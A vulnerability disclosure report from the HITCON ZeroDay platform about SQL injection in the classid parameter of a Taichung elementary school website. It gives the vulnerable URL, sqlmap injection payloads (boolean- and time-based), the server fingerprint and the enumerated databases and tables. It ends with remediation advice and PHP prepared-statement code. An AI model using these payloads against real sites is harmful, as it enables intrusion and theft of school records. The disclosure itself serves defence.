Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00410
- Vendor: 臺中市資訊教育暨網路中心
- Title: Multiple SQL injection points at Dayong Elementary School (大勇國小)
- Introduction: Multiple SQL injection points at Dayong Elementary School (大勇國小)
Processing status
Current status (workflow stages):
- Newly submitted
- Reviewed
- Reported to vendor
- Patched
- Not retested
- Public
Processing history
- 2018/04/06 23:58:45 : Newly submitted (status updated by Cra5h)
- 2018/04/07 00:28:32 : Review completed (status updated by the HITCON ZeroDay service team)
- 2018/04/07 20:13:58 : Being patched (status updated by the HITCON ZeroDay service team)
- 2018/04/07 20:13:59 : Review completed (status updated by the HITCON ZeroDay service team)
- 2018/04/07 20:13:59 : Being patched (status updated by the HITCON ZeroDay service team)
- 2018/05/29 12:46:42 : Retest requested (status updated by the HITCON ZeroDay service team)
- 2018/06/16 03:00:21 : Public (updated automatically by the HITCON ZeroDay platform)
Details
- ZDID: ZD-2018-00410
- Reporter: cra5h (Cra5h)
- Risk: High
- Type: Database injection attack (SQL Injection)
References
Vulnerability description: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
Vulnerability description: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
Vulnerability description: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
Mitigation: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
Related URLs
http://www.dyes.tc.edu.tw/teach_data_1.php?classid=185
Description
Multiple SQL injection points at Dayong Elementary School (大勇國小)
SQL injection location:
http://www.dyes.tc.edu.tw/teach_data_1.php?classid=140
Insufficient filtering of the classid parameter leads to SQL injection
GET parameter 'classid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 122 HTTP(s) requests:
Parameter: classid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=140 AND 8586=8586
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: classid=140 AND SLEEP(5)
[20:52:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL >= 5.0.12
[20:52:29] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.dyes.tc.edu.tw'
Confirmed affected databases (12 databases):
available databases [12]:
[*] arrange_class
[*] class2
[*] class_dyes
[*] class_ok
[*] dyes_data
[*] gallery2
[*] information_schema
[*] mysql
[*] teach_data
[*] teach_data_bak
[*] test
[*] testtest
[20:55:53] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.dyes.tc.edu.tw'
Checking the data volume:
Database: teach_data
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| loginlog | 25285 |
| data | 5117 |
| dataclass | 416 |
| dataclass_o | 411 |
| account | 307 |
| contenttype | 16 |
| post_item | 5 |
| stu_work_collocation | 4 |
| groups | 2 |
| teach_urls | 2 |
| teacher_base | 2 |
| system | 1 |
+---------------------------------------+---------+
Database: dyes_data
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| contenttype | 16 |
| post_item | 5 |
| stu_work_collocation | 4 |
| loginlog | 3 |
| groups | 2 |
| teacher_base | 2 |
| account | 1 |
| system | 1 |
+---------------------------------------+---------+
Database: teach_data_bak
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| loginlog | 11172 |
| data | 2841 |
| dataclass | 316 |
| account | 244 |
| contenttype | 16 |
| post_item | 5 |
| stu_work_collocation | 4 |
| groups | 2 |
| teach_urls | 2 |
| teacher_base | 2 |
| system | 1 |
+---------------------------------------+---------+
Database: class_dyes
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| act_stud | 3305 |
| fin_stud | 1198 |
| school_data | 10 |
+---------------------------------------+---------+
Database: gallery2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| g2_Entity | 42182 |
| g2_ChildEntity | 42117 |
| g2_Derivative | 27484 |
| g2_DerivativeImage | 27484 |
| g2_AccessSubscriberMap | 14633 |
| g2_FileSystemEntity | 14632 |
| g2_Item | 14593 |
| g2_ItemAttributesMap | 14593 |
| g2_ImageBlockCacheMap | 14559 |
| g2_DataItem | 13968 |
| g2_PhotoItem | 13922 |
| g2_SessionMap | 4902 |
| g2_DescendentCountsMap | 2575 |
| g2_PluginPackageMap | 2395 |
| g2_DerivativePrefsMap | 1248 |
| g2_PluginParameterMap | 1014 |
| g2_EventLogMap | 1000 |
| g2_AlbumItem | 624 |
| g2_AccessMap | 267 |
| g2_MimeTypeMap | 157 |
| g2_FactoryMap | 145 |
| g2_FailedLoginsMap | 104 |
| g2_UserGroupMap | 102 |
| g2_TkOperatnMimeTypeMap | 97 |
| g2_PluginMap | 69 |
| g2_Schema | 59 |
| g2_User | 45 |
| g2_ExifPropertiesMap | 44 |
| g2_ThumbnailImage | 39 |
| g2_MovieItem | 38 |
| g2_PermissionSetMap | 24 |
| g2_Getid3PropsMap | 20 |
| g2_TkPropertyMimeTypeMap | 20 |
| g2_TkOperatnParameterMap | 19 |
| g2_PendingUser | 9 |
| g2_TkOperatnMap | 9 |
| g2_Group | 6 |
| g2_RecoverPasswordMap | 5 |
| g2_MaintenanceMap | 2 |
| g2_TkPropertyMap | 2 |
| g2_LinkItem | 1 |
| g2_SequenceEventLog | 1 |
| g2_SequenceId | 1 |
| g2_SequenceLock | 1 |
| g2_WatermarkImage | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 809 |
| help_topic | 466 |
| help_keyword | 395 |
| help_category | 36 |
| db | 13 |
| user | 12 |
+---------------------------------------+---------+
Database: arrange_class
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| school_data | 4 |
+---------------------------------------+---------+
Database: class2
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| act_stud | 1765 |
| fin_stud | 440 |
| school_data | 7 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1296 |
| STATISTICS | 290 |
| KEY_COLUMN_USAGE | 202 |
| TABLES | 172 |
| TABLE_CONSTRAINTS | 163 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 12 |
+---------------------------------------+---------+
[22:08:19] [INFO] fetched data logged to text files under 'C:\Users\Administrator.sqlmap\output\www.dyes.tc.edu.tw'
Remediation advice
Input filtering and parameterized queries
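As an added illustration of the two remedies named above (this is example code, not the reporter's or the school's own), the vulnerable concatenation pattern behind a lookup like teach_data_1.php?classid=140 is shown beside a hardened version that validates the parameter's type and then binds it with a PDO prepared statement. The table name dataclass comes from the report's table listing; the column name and the connection details are assumptions.

```php
<?php
// Added example, not the site's own code. The column name and the database
// credentials are assumed; the table name dataclass comes from the report.

// Vulnerable pattern behind this report: the raw query-string value is
// concatenated into the statement, so a value such as "140 AND SLEEP(5)"
// is executed as SQL instead of being treated as data.
function buildVulnerableQuery($classid) {
    return "SELECT * FROM dataclass WHERE classid = " . $classid;
}

// Hardened version: validate the type first (the "filtering" remedy), then
// bind the value as a typed parameter (the "parameterization" remedy) so
// MySQL never parses the user-supplied value as part of the SQL text.
function fetchClassData(PDO $db, $rawClassid) {
    // classid is a numeric identifier; anything else is rejected up front.
    if (!ctype_digit((string) $rawClassid)) {
        header('HTTP/1.1 400 Bad Request');
        return array();
    }
    $stmt = $db->prepare('SELECT * FROM dataclass WHERE classid = :classid');
    $stmt->bindValue(':classid', (int) $rawClassid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Assumed connection details. Emulated prepares are disabled so the binding
// is performed by the MySQL server rather than by client-side escaping.
$db = new PDO('mysql:host=localhost;dbname=teach_data', 'dbuser', 'dbpass',
    array(PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
          PDO::ATTR_EMULATE_PREPARES => false));

$classid = isset($_GET['classid']) ? $_GET['classid'] : '';
$rows = fetchClassData($db, $classid);
```

The stack sqlmap fingerprinted (CentOS 5.10, Apache 2.2.3, PHP 5.1.6) is long past end of life, so the query fix should be accompanied by a platform upgrade rather than stand alone.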